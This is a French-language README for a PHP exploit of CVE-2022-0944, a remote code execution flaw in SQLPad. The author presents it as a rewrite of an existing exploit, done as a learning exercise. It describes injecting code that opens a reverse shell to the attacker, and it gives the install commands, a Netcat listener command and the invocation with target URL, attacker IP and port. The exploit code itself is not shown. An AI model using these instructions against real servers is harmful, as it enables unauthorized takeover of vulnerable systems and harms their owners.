
CVE-2022-0944 Remote Code Execution Exploit
Ce code PHP est conçu pour exploiter une vulnérabilité d'exécution de code à distance (RCE) dans SQLPad, liée à CVE-2022-0944.
Il fonctionne en injectant du code malveillant dans l'application SQLPad, la forçant à exécuter une commande système qui ouvre un reverse shell – une connexion qui accorde à l'attaquant un contrôle à distance du système vulnérable.
sudo apt-get install php-clisudo apt-get install php-curlPour capturer la connexion du reverse shell, démarrez Netcat sur la machine de l'attaquant :
nc -lvnp 4444
php exploit.php <root_url> <attacker_ip> <attacker_port>
<root_url> : L'URL racine du SQLPad vulnérable (par exemple, http://target.com:3000)
<attacker_ip> : L'adresse IP de l'attaquant à l'écoute de la connexion inverse (identique à l'IP de Netcat)
<attacker_port> : Le port sur lequel l'attaquant écoute (identique au port de Netcat)
La logique d'exploit originale était basée sur ce dépôt :
🔗 0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944
Mon objectif ici était de comprendre la logique de l'exploit et de la réécrire dans un autre langage de programmation comme défi personnel.
Référence supplémentaire : 🔗 CVE-2022-0944 – NVD